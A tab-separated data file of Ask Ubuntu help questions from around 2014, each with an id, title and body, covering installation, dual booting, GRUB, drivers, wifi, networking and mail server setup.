474567	upgrading current version of ubuntu , on a multi boot system .	i find that i 'm unable to upgrade the existing version of ubuntu on my multiboot system ( windows 7 on the other half of the partition ) . can i simply do a clean install from within the partition ?
474568	how to access ubuntu files from bootable usb `` try ubuntu '' section	few hours ago i have tried to open my pc but i got error called `` bootmgr is missing '' please restart pc , after little research i thought that i should create bootable ubuntu usb and access my ubuntu files and backup some of them . ( i dont have a windows 7 cd so i ca n't repair the system ) . i plugged in the usb and wait for ubuntu panel 2 options were there - > `` try ubuntu '' and `` install ubuntu '' so i clicked first one and bootable ubuntu opened ( *where i 'm writing this problem ) but i could not find ubuntu files i can only see my windows 7 files when search . where can i get ubuntu files so i can get backup and re-install windows or repair it ?
474570	ubuntu 14.04 dvd installation not loading	i am currently running xubuntu 13.10 , and have burned ubuntu 14.04 onto a dvd . whenever i put the dvd into the disk dive and turn on my laptop the xubuntu start screen appears , instead of the ubuntu installation screen . my laptop is a toshiba satellite c850-1kn , and i ca n't get to the bios because it is password protected .
474572	sound is not coming in my earphones but it is coming from my laptop speakers	sound is not coming from my earphones but when i unplug my earphone sound comes from my speakers . my laptop is asus k55v and my ubuntu version is 12.04 lts .
474577	z97 chipset and motherboard drivers for ubuntu 14.04	i understand that like windows , drivers need not be explicitly installed in linux . linux kernel itself comes with required drivers and is loaded during boot . i was wondering if 14.04 's kernel has z97 chipset related drivers to support the z97 processors and motherboards . thanks ,
474581	complete removal of ubuntu one from my ubuntu computer	how do i completely remove ubuntu one ( u1 ) from my computer running ubuntu 12.04 ?
474590	ubuntu live cd does not recognize a windows partition with data on it	ok , in my desktop i have 2 hdd each one with several partitions . in windows i 've renamed the partition of one drive that i 've wanted to delete to make a clean ubuntu 14.04 install . to make sure that i would n't loose precious data , i 've removed the other hdd . when i 've booted from cd i wanted to make sure , again , that i would n't lose data , so i 've entered the `` try ubuntu '' . i 've did a quick format of the partition renamed in windows ( actually by it 's size ) and being paranoid of not loosing data i 've checked again if the other partition is still there . well , it 's not ! please , can anyone help me recover the data ?
474592	empathy and pidgin not showing offline facebook messages	when i start empathy or pidgin , i do n't see any notifications that someone has sent me a facebook message while i am offline . i start receiving messages after opening any of the two clients . is there a workaround or another client that receives messages offline ?
474597	install ubuntu side by side with windows	i 'm trying to setup both windows 7 and ubuntu 14.04 desktop on the same machine . i 've partitioned the disk into 3 parts , so that i can have windows ubuntu shared partition for files i 've installed windows 7 on the first partition ( which created a small partition of 100mb for boot ) , so now i have 4 partitions on the disk which is all it can take . now i am installing ubuntu , and it 's asking me whether i want to : install ubuntu inside windows 7 replace windows 7 with ubuntu ( no ! ) something else i want the ubuntu installation to go into the partition that i prepared for it . should i choose `` something else '' ? if i do so -- will i be able to choose which os to load at boot ? can anyone explain how `` ubuntu inside windows '' work ? it says that it will allow me to choose which os to load at boot , which is desired . update : when choosing `` something else '' i see also an option for device for boot loader installation : /dev/sda -- the ssd disk itself /dev/sda1 -- the windows 7 loader ( 100mb partition ) /dev/sda4 -- which is one of the other partitions which one should i choose there ? tia !
474599	what is the difference between xubuntu with unity and ubuntu ?	i have xubuntu 13.04 and am having trouble with installing ubuntu , so i was wondering , `` could n't i just install unity ? '' . if there is no difference , then how would i go about installing unity and deleting xfce ?
474601	smcwusbs-n3 ralink rt3070 disconnected wifi	i 'm using ubuntu 14.04 64bits , and this wireless pen to connect to the internet . i 've tryied to update de driver from rt2870 to rt3070 , downloading the latest linux drivers from smc website . after that i my wireless networks disappeared and i ca n't connect . here 's the output of lsusb when pen connected : bus 003 device 006 : id 083a : a701 accton technology corp. smcwusbs-n3 ez connect n wireless adapter [ ralink rt3070 ] the output of nmcli nm : running state wifi-harware wifi wwan-hardware wwan running disconnected enabled enabled enabled disabled what 's happenning ? thanks for your help ! tiago
474603	mouse pointer is blinking and some time disappear	after upgrade to ubuntu 14.04 my mouse pointer is blinking and some time it 's disappear , i do n't know why this happening i search lots of for this issue and i get some results but unable to get solutions . this is my display in settings - > display
474604	trying to install the latest ubuntu ( 32 bit ) powers down when loads cd	i am installing the latest ubuntu iso from their website from cd . boots from cd and then a flashing pipe appears for a few seconds . instantly flashing on and straight off is this text : loading bootlogo ... initializing gfx code ... and then once its gone the cd noise stops and i am left with a black screen and my computer is virtually powered down . ( power still on but no noise/anything from it ) . i have scoured google and all i can find is post setup blackscreens - any help ? ive also removed any usb attachments as one stackoverflow post suggested - still nothing .
474605	connecting ubuntu 13.10 box to a vizio e601i-a3 tv	first , a briefe background on myself . i 'm in it . i 've done both hardware and software tech support so i 'm not an idiot when it comes to technology . however , i am totally new to linux boxes and hooking up to a tv ... figured it would not give me much difficulties ... i was wrong ... : ( i 'm working on setting up my first media pc ( it is a custom built box from my old company that they were going to throw away ) running ubuntu 13.10 and i 'm having issues connecting it to my vizio e601i-a3 tv . here is some hardware info on the media pc : processor : pentium ( r ) dual-core cpu es200 @ 2.50ghz x 2 graphics : gallium 0.4 on amd cedar sapphire radeon hd 5450 1 gb ddr3 hdmi/dvi-i/vga pci-express graphics card 100292ddr3l os : ubuntu 13.10 - 64-bit receiver : denon avr-931 trying to connect to a vizio e601i-a3 tv . my box runs with a regular monitor but when i plug it in via hdmi to my receiver to my tv , nothing shows up on the tv . i 'm sure i have the correct settings selected for my receiver and tv . i have my tv plugged in from hdmi 1 to the receiver . my xbox 360 runs fine plugged into the `` game '' hdmi port . i plugged in my media pc into the `` dvd '' hdmi port and selected that on the receiver and i get no signal . since i know the `` game '' port works , i tried there too , with no success . in display settings it recognizes the tv as , `` denon , ltd. 60 '' '' so it knows it is there , and knows how big it is . i 'm thinking it is a driver issue ? i am able to change resolutions but still nothing pops up on the tv . i 've tried the classic restart , of everything . i have tried googling the issue but my googling skills are currently failing me . i 've also posted this to reddit with no help : ( any help would be appreciated . i 'll also continue to update this with updates on things i 've tried . thanks in advance !
474606	smartreader acr38u does n't work with icedtea-7-plugin in firefox	i ca n't to use my cardreader acr38u with icedtea-7-plugin in firefox . : ( cardreader in pcsc_scan work good , without problem . how i can fix this ? ubuntu 14.04 firefox 29. java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode )
474607	lubuntu - disable `` removable media is inserted '' window	i installed lubuntu 14.04 on my intel nuc , together with xbmc to create a home theater pc and encountered a small problem while i inserted a usb stick into the htpc . it seems that the default `` a removable device is inserted '' window from lubuntu shows up and it takes over the entire screen , rendering my remote unusable until i connect a keyboard/mouse to dismiss the window . xbmc picks up the usb device just fine . see this link for a picture : https : //onedrive.live.com/download ? resid=4c5cdcce708e6c4b ! 56655 & authkey= ! agqykyehvejfru0 & v=3 & ithint=photo % 2c.jpg anybody knows which package is responsible for displaying this ? i know that for ubuntu , this can easily be changed in system settings , but have n't found this yet for lubuntu . to be clear , i still want the usb stick to be automounted ! i just do n't want this window to appear ; ) . lubuntu 14.04 intel nuc happens with any ordinary usb stick .
474608	will usb 3.0 video adapter work with ubuntu ?	i am thinking about buying a usb 3.0 video adapter ( like those ) to use with my laptop , when it is docked in a docking station . docking station only has one video output ( displayport ) , but maybe i could have a second one via a usb 3.0 video adapter . how well ( if at all ) do those work in ubuntu ? what kind of performance can i expect ? ( i intend to use a second monitor for programming and office work , not very demanding applications video-performance-wise , but it would be nice to know what can i expect : is playing video not out of the question ? games ? ) any specific recommendations ?
474611	ubuntu 12.04 dropbox icon missing in tray ( no working solution )	i have the dropbox missing icon display problem . i try solutions like `` sudo apt-get install libappindicator1 '' , removing all the package and dropbox directories , reinstalling and no icon shows up . the dropbox daemon works and update the directory without problem . this is strange since , i use 2 different ubuntu 12.04 installations , one show up the dropbox icon fine and the second do not . thanks
474614	how can i set firefox settings with a bash scipt ?	i would like to create a bash script that i can run on several computers that will set some basic preferences and bookmarks for firefox ( and possibly google chrome ) on ubuntu 12.04 . i think user data is stored in ~/.mozilla/firefox/ but i do n't know exactly how i would set preferences on a fresh install . does anyone have an insight on this ? specifically , i 'd like to be able to create a bash script that ... sets bookmarks sets the bookmarks toolbar to always show sets the cache to be emptied when the browser closes turn off remembering passwords
474615	where can i buy music ?	with ubuntuone closing down , emusic quitting al suppport for their linuxclient , i have but one question : where can i spent my euros to buy legal music . on ubuntu ?
474620	how to use webrtc acoustic echo canceller aec with pulseaudio	i tried to install pulseaudio-5.0 but when i use ./configure i found that the echo canceller webrtc is disabled while the speex andrian aec are enabled ! ! this is the message : enable udev : yes enable hal- > udev compat : yes enable systemd login : no enable systemd journal : no enable tcp wrappers : no enable libsamplerate : yes enable ipv6 : yes enable openssl ( for airtunes ) : no enable fftw : no enable orc : no enable adrian echo canceller : yes enable speex ( resampler , aec ) : yes enable webrtc echo canceller : no enable gcov coverage : no enable unit tests : no database tdb : no gdbm : no simple database : yes system user : pulse any one have an idea on how to deal with this problem ? thanks ! !
474621	downgrade from 14.10 to 14.04	is there any easier/different way to downgrade from 14.10 to 14.04 other than usb ? i know it 's a developmental branch which may make things different , but they want 14.04 now ( lts ) . a lot of data is riding on this machine which is part of a server cluster . any one have any luck using this ? : https : //help.ubuntu.com/community/downgradehowto
474622	how to simulate closing the lid ?	i have probem with my laptops monitor . when i move my laptop , sometimes screen goes white , blank . then i have to open and close lid . it is very annoying because when i open it its moves and turn white again . i though about makeing key to simulate closing and opening my lid . is there a way to do this ? some script , some command ?
474623	problem installing ubuntu 14.04 into a laptop using windows 8.1	i have used ubuntu on my lg laptop for several years . i lately bought an acer aspire v5 laptop which included windows 8.1 . i do n't have any data on it ; i would like to just remove it completely ( that horrible windows 8.1 ) and install ubuntu . i tried using a usb device with ubuntu 14.04 ( 64bit version ) saved on it . i changed the bios configuration , putting usb device first on boot order , windows boot manager last . when i try to run with usb device it does n't work . messages like these show up : system does n't have any usb boot option . please select other boot option in boot manager menu . windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1. insert your windows installation disc and restart your computer 2. choose your language settings , and then click `` next '' 3. click `` repair your computer '' if you do not have this disk , contact your system administrator manufacturer for assistance file \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : the application or operating system could n't be load ... [ ? ] required file is missing or contains errors . could someone please write step-by-step procedures to install ubuntu 14.04 after removing windows 8.1 ? i already have done a second partition on the hard disk just in case .
474627	failed to install grub on a separate '/boot ' partition on a fake raid 0 ( 12.04lts )	i 'm having some problems getting grub configured for ubuntu 12.04lts on a fake raid 0 . i can either get the grub rescue prompt at startup , or just a grub prompt but i can not boot to ubuntu manually . how can i configure the grub to actually use the ubuntu install ? the steps taken : installing ubuntu on fake raid the ubuntu installer can not install ubuntu on the drive . after defining the partitions to use it fails with `` error : ? ? ? `` , pressing ok terminates the installer . therefore , i used gparted to configure the partitions : /dev/mapper/sil_agadaccfacbg : ( the raid configuration , created partition ) : /dev/mapper/sil_agadaccfacbg1 : ext2 , 200mib , ( with 'boot ' flag ) /dev/mapper/sil_agadaccfacbg3 : ext2 , 67.75gib , ( which will contain ubuntu ) /dev/mapper/sil_agadaccfacbg2 : extended , 1.00gib , ( for swap ) contains : /dev/mapper/sil_agadaccfacbg5 : unknown because of the fake-raid , i already mounted the destination partitions before running the ubuntu installer : > mkdir /mnt/boot > sudo mount /dev/mapper/sil_agadaccfacbg1 /mnt/boot > mkdir /mnt/ubuntu > sudo mount /dev/mapper/sil_agadaccfacbg3 /mnt/ubuntu in the installer i chose the following partition usage : /dev/mapper/sil_agadaccfacbg1 ext2 , mount at /boot ( 209mb ) /dev/mapper/sil_agadaccfacbg3 ext2 , mount at / ( 72751mb ) /dev/mapper/sil_agadaccfacbg5 swap device for boot loader installation : /dev/mapper/sil_agadaccfacbg , linux device-mapper ( striped ) ( 74.0gb ) this will install ubuntu , but will fail to install grub ( it seems to use /dev/sda no matter which one i choose ) installing grub with dpkg-reconfigure i followed this guide , but adapted it for two partitions : sudo mount /dev/mapper/sil_agadaccfacbg3 /mnt/ubuntu sudo mount -- bind /dev /mnt/ubuntu/dev sudo mount -- bind /proc /mnt/ubuntu/proc sudo mount -- bind /sys /mnt/ubuntu/sys sudo mount /dev/mapper/sil_agadaccfacbg1 /mnt/boot sudo mount -- bind /boot /mnt/boot sudo chroot /mnt/ubuntu dpkg-reconfigure grub-pc however , it does not ask where to install grub ( i should choose /dev/mapper/sil_agadaccfacbg somewhere.. ) after reboot i get the grub rescue prompt with message no such device installing grub with grub-install after the same mount commands as above , i continued with : > sudo grub-install -- root-directory=/mnt/boot /dev/mapper/sil_agadaccfacbg this gives the following message : /usr/sbin/grub-probe : error : can not find a device for /mnt/boot/boot/grub ( is /dev mounted ? ) it does succeed when mounting just the boot partition : sudo mount /dev/mapper/sil_agadaccfacbg1 /mnt sudo grub-install -- root-directory=/mnt/ /dev/mapper/sil_agadaccfacbg this finishes with : installation finished . no error reported . after reboot i get the grub console , with welcome text . attempting to manually start ubuntu : ls ( hd0 ) ( hd0 , msdos3 ) : ( ubuntu install partition ) ( hd0 , msdos1 ) : ( ubuntu boot partition ) ( hd1 ) ( hd1 , msdos1 ) : ( ubuntu live usb ) ls ( hd0 , msdos3 ) / contains : - vmlinuz - lib/ - tmp/ - initrd.img - mnt/ - var/ - proc/ - boot/ - root/ - etc/ - run/ - media/ - sbin/ - bin/ - selinux/ - dev/ - srv/ - home/ - sys/ ls ( hd0 , msdos1 ) / contains : -grub/ -boot/ -initrd.img-3.8.0-29-generic -vmlinuz-3.8.0.29-generic -config-3.8 linux ( hd0 , msdos3 ) /vmlinuz this returns `` error : out of disk '' installing grub on ubuntu partition with grub-install > sudo mount /dev/mapper/sil_agadaccfacbg3 /mnt > sudo grub-install -- root-directory=/mnt/ /dev/mapper/sil_agadaccfacbg this finishes with message : > installation finished . no error reported . after reboot get the message `` error : out of disk '' and the grub rescue prompt . configuring grub with grub-mkconfig attempting to run grub-mkconfig with different destinations results in the same message : /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . remarks : initially i did n't use a separate /boot partition , but the grub install then also failed . because some mention that a small partition at the beginning of the drive is necessary on old machines , i retried with a /boot partition this is a single boot ( no other os 's installed/used ) *with fake raid i mean a software/bios raid , provided with the motherboard .
474628	problem installing gtk2 - unable to correct problems	i have recently tried to install libgtk2.0-dev with the following command : sudo apt-get install libgtk2.0-dev but the only thing i got was this error : the following packages have unmet dependencies : libgtk2.0-dev : depends : libglib2.0-dev ( > = 2.27.3 ) but it is not going to be installed depends : libgdk-pixbuf2.0-dev ( > = 2.21.0 ) but it is not going to be installed depends : libpango1.0-dev ( > = 1.20 ) but it is not going to be installed depends : libatk1.0-dev ( > = 1.29.2 ) but it is not going to be installed depends : libcairo2-dev ( > = 1.6.4-6.1 ) but it is not going to be installed depends : libx11-dev ( > = 2:1.0.0-6 ) but it is not going to be installed depends : libxext-dev ( > = 1:1.0.1-2 ) but it is not going to be installed depends : libxinerama-dev ( > = 1:1.0.1-4.1 ) but it is not going to be installed depends : libxi-dev ( > = 1:1.0.1-4 ) but it is not going to be installed depends : libxrandr-dev ( > = 1:1.2.99 ) but it is not going to be installed depends : libxcursor-dev but it is not going to be installed depends : libxfixes-dev ( > = 1:3.0.0-3 ) but it is not going to be installed depends : libxcomposite-dev ( > = 1:0.2.0-3 ) but it is not going to be installed depends : libxdamage-dev ( > = 1:1.0.1-3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i tried fixing it with sudo apt-get -f install but with no luck , how can i remove this problem ? how do i install the dependent packages ? sorry for a possible duplicate , but i did not find the solution to the exact same problem i have .
474629	is it possible at all to watch movies on 256mb ram ?	recently installed lubuntu on 256mb ram , intel celeron , intel corporation 82845g/gl ( video card ) and i can not get any movies to play at all through vlc . youtube works just fine , but no movie will load/play . even loading xbmc from login does n't allow playback
474635	deleting ubuntu help ?	so i downloaded ubuntu and chose to replace it instead of using win7 but now i want win7 back and the recovery disks only say udf volume and are no use . please help ?
474637	how to fix a gstreamer error	i upgraded to 14.04 and now gstreamer is not working . what i am trying to accomplish is to hear the audio input on my computer coming from a ham radio . this is the command that i am using : gst-launch pulserc ! pulseink . this is the error message that i am receiving : error : pipeline could not be constructed : no element `` pulserc '' . i think that i may be missing some plugins . i have been trying to investigate and found this troubleshooting website . gstreamer.freedesktop.org in it , i found this information . first i downloaded gstreamer-properties with sudo apt-get install gnome-media . then i typed gstreamer-properties and a configuration page came up . with these configurations i clicked on `` test '' and was able to hear what was coming from the radio through the computer . but i am still coming up with the same problem when typing gst-launch pulserc ! pulseink . i found another clue- pulseink also gets a `` no element '' error message . thank you again everyone for all of your help , i appreciate it .
474640	static ip but dynamic nameservers ?	trying to change nameserver ' settings for a ubuntu-13.04 server i came upon this situation ! /etc/network/interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.1.100 netmask 255.255.255.0 gateway 192.168.1.254 dns-nameservers 10.1.1.20 , 8.8.8.8 dns-search null.local /etc/resolv.conf : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 10.1.1.20 nameserver 8.8.8.8 search null.local … so i had to change the dns addresses… dns-nameservers 10.1.1.21 10.1.1.22 … and then recycle eth0 for the network configuration to rebuild itself : ~ $ sudo ifdown eth0 & & sudo ifup eth0 but this is the /etc/resolv.conf i get : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 172.31.0.5 nameserver 10.1.1.21 nameserver 10.1.1.22 search wth.local null.local fyi , 172.31.0.5 is in a `` neighbor '' network , apparently a dns/dhcp server for the 'wth.local ' domain i have no access to which `` leaks '' on my side ! ( this situation is temporary , but for now it has to stay that way ) what i ca n't explain and wish to understand is why ? why , if i specifically configure a static interface a dhcp process comes and messes with dns ? this is one server , i made the same changes on two others without any problems .
474643	multiple keypresses not working properly in games	i have an issue with my keyboard on ubuntu 13.10 but this has been going on since 9.10 . i tried to test on a wine game ( mass effect 3 ) and on a native linux game ( left for dead 2 on steam ) both with similar issues . if i press 'w ' to move forward and press 'a ' or 'd ' to strafe ( while still holding down 'w ' ) and then let go of 'a ' or 'd ' , the transmission of 'w ' to move forward simply halts . i have repeat keys enabled ( key presses repeat when key is held down ) and i 'm not certain what is causing my issues . for what its worth , my keyboard is a ps/2 keyboard hooked up into a usb adapter . the model number is : logitech y-sz49 .
474645	some keyboard keys do not work after installing ubuntu 14.04 lts	i just installed ubuntu 14.04 , and some keys f5 , f8 , w , p , f , h , k , l , fn , left , right , up and backspace ) are dead and do not respond . when i check in the keyboard layout chart they simply donâ´t light up and changing keyboard languages also made no difference . my keyboard was working just fine before installing ubuntu 14.04 . p.s . i have just tried the first answer from this post : after upgrading to ubuntu 14.04 , my shortcuts keys and media keys no longer work and unfortunately it didnâ´t work for me . my laptop is a toshiba satellite a300-1eh . p.s.2 i just realized that the above mentioned keys stopped working on the whole machine all together ( they do n't work at windows nor even in bios ) . it all happened during the ubuntu installation . p.s.3 i tried installing both ubuntu 12.04 and than again 14.04 , nothing has changed . i now remember though that by the first installation something went wrong , i got a black screen , and had to reboot . it was probably than that the enlisted keys stopped working ( on the whole machine- they do n't even work in bios now ) . is there any way of re-installing the keyboard drivers for the whole laptop ?
474646	ca n't install software -- can i fix missing dpkg ?	new software ca n't be installed , because there is a problem with the software currently installed . do you want to repair now ? hit repair package operation failed the installation or removal of a software package failed . details = > installarchives ( ) failed : could not exec dpkg ! error in function ( synaptic:12725 ) : glib-critical ** : g_child_watch_add_full : assertion 'pid > 0 ' failed could not exec dpkg ! e : sub-process /usr/bin/dpkg returned an error code ( 100 ) a package failed to install . trying to recover : sh : 1 : dpkg : not found
474652	best/cannonical way to set up ssh-agent on ubuntu server ?	unlike ubuntu desktop , ubuntu server does not come with ssh-agent pre-installed and conveniently set up and running . i see plenty of suggestions on the net how to do it , but is there a best practice/cannonical way of doing this ?
474653	lock screen elements & wallpaper frozen	i have finally made the switch from windows to ubuntu and now have to ask the first question because search did not help me this time . the problem is easily described : the elements shown in the lockscreen on boot ( ubuntu logo in the middle and watermark in bottom left corner ) stay there even when i 'm entering desktop and i can not change the wallpaper anymore . how can i remove them again ? they have n't been there in the first place , but after updating ubuntu with update center , the problem occured . as i cant post an image here with my reputation , pls see this link : http : //s30.postimg.org/age8fraww/screenshot_from_2014_05_30_23_27_58.jpg thanks for your help and time . kind regards
474657	keyboard not working in grub	i installed ubuntu alongside windows 7 . now when i get to the menu to select my keyboard will not work so i can not choose any os to boot . my keyboard works in bios . and i have checked and legacy is enabled . i do n't have another keyboard to test . and frankly i 'd rather not go buy one . this is very annoying that i ca n't even boot once ... any help is appreciated .
474659	improving performance issues on fl92 with ubuntu ?	ubuntu 32bit 14.04 runs very slowly on my compal fl92 which runs vista and windows 7 just fine . i also have problems with the boot being extremely slow , about 5 - 10 minutes sometimes and the shutdown going on forever to the point where i need to force power off my machine sometimes . i have tried re-installing it multiple times . the interesting thing is it seems to run just fine when i try it out booting from a usb drive . i also have similar booting and shutdown issues when i use kubuntu and linuxmint but it does seem to run much more smoothly than the unity de . i would prefer using kubuntu over unity or mint if i can just get the boot and shutdown time to be reasonable . my hardware is : processor : intel core 2 duo t8300 memory : 2gb ddr2/667 video : nvidia geforce 8600m gt is there anything i can do to improve boot and shutdown times or is it simply that my hardware is insufficient to run these os 's ? i have heard that changing the swappiness value improves performance and not requiring a disk check every boot helps also but i am looking for more information .
474660	sudo apt-get install skype ?	running unbuntu 14.04 lts , i tryed to install skype . in terminal : sudo sh -c ‘echo “deb http : //archive.canonical.com/ubuntu trusty partner” > > /etc/apt/sources.list.d/canonical_partner.list’ sudo apt-get update sudo apt-get install skype e : unable to locate package skype sudo apt-get -f install sudo apt-get install skype e : unable to locate package skype so , no skype ... how do i get skype ?
474662	wubi not working lubuntu	i am trying to install lubuntu 14.04 using wubi . i have already compared the md5 of the image lubuntu-14.04-desktop-amd64.iso with the one given at ubuntuhashes and it matched . i also burnt the image to a pendrive and used the live system . so , the image file i downloaded can be assumed to be not corrupted but i still get the error : can not download the metalink and therefore the iso . i have googled a lot and nearly tried out all the methods mentioned there but still unable to install the wubi . please help and thanks in advance .
474663	setting up nat for internet access on a connected router	i 'm setting up a nat for a connected router to my laptop using the following command ( ip forwarding is enabled ) : sudo iptables -t nat -a postrouting -s 192.168.47.0/24 -o eth0 -j masquerade so basically i have a eth0 which is my laptop 's lan , and a usb-cat5 -based connection from my laptop to a wireless router , which is eth1 . and i am assigning a static ip to my eth1 interface ( i.e . connected to the wireless router ) using the following command : sudo ifconfig eth1 192.168.47.1 netmask 255.255.255.0 up and i run ifconfig to make sure eth1 has this ip address : eth0 link encap : ethernet hwaddr 28 : d2:44:77:39:0e inet addr:129.46.79.72 bcast:129.46.79.255 mask:255.255.254.0 inet6 addr : 2002 : c023:9c17:118 : f5ea : ed5a:6c19:138d/64 scope : global inet6 addr : fe80 : :2ad2:44ff : fe77:390e/64 scope : link inet6 addr : 2002 : c023:9c17:118:2ad2:44ff : fe77:390e/64 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:289511 errors:0 dropped:324 overruns:0 frame:0 tx packets:103659 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:87784569 ( 87.7 mb ) tx bytes:26739445 ( 26.7 mb ) interrupt:20 memory : f0600000-f0620000 eth1 link encap : ethernet hwaddr 00:50 : b6:0a:4c:5e inet addr:192.168.47.1 bcast:192.168.47.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:2268 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:104328 ( 104.3 kb ) tx bytes:0 ( 0.0 b ) the router 's settings has been setup . my problem is that when i 'm connected to the router , i do n't have any internet connection . can someone help me with that ?
474669	ssd temperature sensor readout with hddtemp	it seems hddtemp can not detect the temperature sensor of my ssd ( samsung evo 840 ) properly.this is the bash output when running hddtemp : warnung : laufwerk /dev/sda scheint keinen temperatur-sensor zu haben . warnung : das bedeutet nicht , dass es keinen besitzt . warnung : falls sie sicher sind , dass es einen besitzt , kontaktieren sie mich bitte ( hddtemp @ guzu.net ) . warnung : siehe optionen -- help , -- debug und -- drivebase . /dev/sda : samsung ssd 840 evo 120g b ďż˝ @ : kein sensor i looked in the most recent .db file posted on http : //nongnu.mirrors.hostinginnederland.nl//hddtemp/hddtemp.db , but it does n't seem to list any ssd drives at all . was anyone able to readout the temp-sensor of a ssd with hddtemp ?
474670	wi-fi not working for ubuntu 14.04	i have installed ubuntu 14.04 ( trusty tahr ) on a dell vostro 2520 laptop . wi-fi is not working after installation . i tried several methods to install it , but nothing happens . vostro-2520 : ~ $ sudo rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no vostro-2520 : ~ $ iwconfig usb0 no wireless extensions . eth0 no wireless extensions . lo no wireless extensions . the hardware is broadcom 802.11 bcm43142 .
474671	dual-boot question involving separate hd and windows 8	i use an external hd with ubuntu+grub on it . this allows me to effectively `` hijack '' most systems . basically it 's a permanent liveusb - my own system wherever i go . i use it for recovery mainly when windows systems muck up , and for portability ( as i can have my system on the go , without effecting the pc i 'm borrowing , much like a livecd ) . i 'm about to update to windows 8 now [ on a new , different computer ] . is there any special measure i should take to do this ? i 've seen a similar post here , but the op had both harddrives plugged in simultaneously - that 's not exactly my setup . thank you : ) edit : added for clarification that this is for a totally new computer .
474672	how to remove `` advanced options for ubuntu '' in grub menu	how would i remove `` advanced options for ubuntu '' in grub menu ? this is what i see in the grub menu : ubuntu advanced options for ubuntu opensuse advanced options for opensuse centos advanced options for centos i want my grub to look like : ubuntu opensuse centos i am using this command to remove memtest86 sudo chmod -x /etc/grub.d/20_memtest86+ & & sudo update-grub and it is working for memtest86 but i can not find any command to remove this problem
474677	dual boot with windows 8.1 and 12.04.4 ubuntu . with 2 drives in uefi mode	so i was able to install ubuntu in legacy mode on my second ssd . now i have learned that i ca n't dual boot with out ubuntu in uefi mode . i have a disc with ubuntu live on it . i go into the boot menu and try to boot from disc to do a reinstall . ( no data on ubuntu side and yes secure is off ) now when i try to boot from disc i get i think it is grub telling me that `` no device is set '' and proceeds to give me junk on my screen in the form of pixels everywhere . now i know about removing hard drives is the easiest but not so much for an alienware m17xr4 . i do n't have a good environment for that . nor am i confident in my a+ abilities . i have scoured the internet and nothing really helps . any advice would be great .
474680	updating from 9.04 to the newest version	i have recently acquired a laptop that runs ubuntu 9.04 . i personally have never heard of or seen this os and am pretty confused by it , after spending all day trying to log into it , i finally go in but now i cant seem to update it to the newest version . please help this noob update his new laptop .
474684	i am unable to see anything on the screen while using any version of ubuntu	every time i install ubuntu either 12.10 or any version of linux mint it install well but i can not be able to see anything on the screen on when i use a desktop screen by connecting on a vga that time i see from a different screen .
474686	num lock key triggers tab ?	i recently installed kubuntu 14.04 and ever since then did n't get my num pad to work . i have a samsung laptop with a num pad ( not in a higher layer on the main board , but next to it ) . the system automatically chose 'generic keyboard with 101 keys ' , which is correct . i can also use the arrows , pgup , pgdown etc . on the num pad . but when i try to activate the numbers by hitting num lock , nothing happens . instead , it writes a tabulator in any text editor . in terminal , it activates the command completion , so it seems to be a real tab signal . it might be an issue with the german neo layout that i have set up as default , but switching to a different layout did n't help . and yes , i made sure that the option `` control mouse cursor with arrow keys '' is disabled . i have no idea what the problem is . any ideas ?
474687	unable to connect to mail server via imap and roundcube	i am having trouble getting the final parts of my mail server up and working . i followed this tutorial to get everything set up on the mail server side . i have installed roundcube for webmail and configured it but it is saying `` error connecting , connection refused '' when attempting to connect to it using imap . this is thorough the `` test imap '' section of its installer . also it is giving me an error message about perissions for it 's log and temp folders but that 's not as important as acutally getting mail to work . i have also tried connecting to the mail server using thunderbird however it can not establish a connection either and i know my login information is correct . i know that the databases are working correctly based on the roundcube installer telling me that they have been `` successfully initialized '' . here are my firewall rules -a input -i lo -j accept -a input -m conntrack -- ctstate related , established -j accept -a input -p tcp -m tcp -- dport 22 -j accept -a input -p tcp -m tcp -- dport 25 -j accept -a input -p tcp -m tcp -- dport 80 -j accept -a input -p tcp -m tcp -- dport 443 -j accept -a input -p tcp -m tcp -- dport 465 -j accept -a input -p tcp -m tcp -- dport 487 -j accept -a output -p tcp -m tcp -- dport 993 -j accept -a input -j drop which i set up in iptables . i have modified them from what i used in this tutorial i 'm not sure what to try next . any help would be wonderful ! i am using ubuntu 14.04 server , apache 2.4.7 , roundcube 1.0.1 , and the latest versions of dovecot and postfix . the email databases are contained in mysql . i am running this on a vps server . update : i have changed from iptables to using ufw . i have run the following commands to set up a basic firewall with ufw . ufw default deny ufw allow ssh ufw allow http ufw allow https ufw allow imap ufw allow imaps ufw allow smtp i then used telnet to check all of the mail ports . but port 993 isnt working even though ufw says both 993 and 993/tcp are open . what am i missing ?
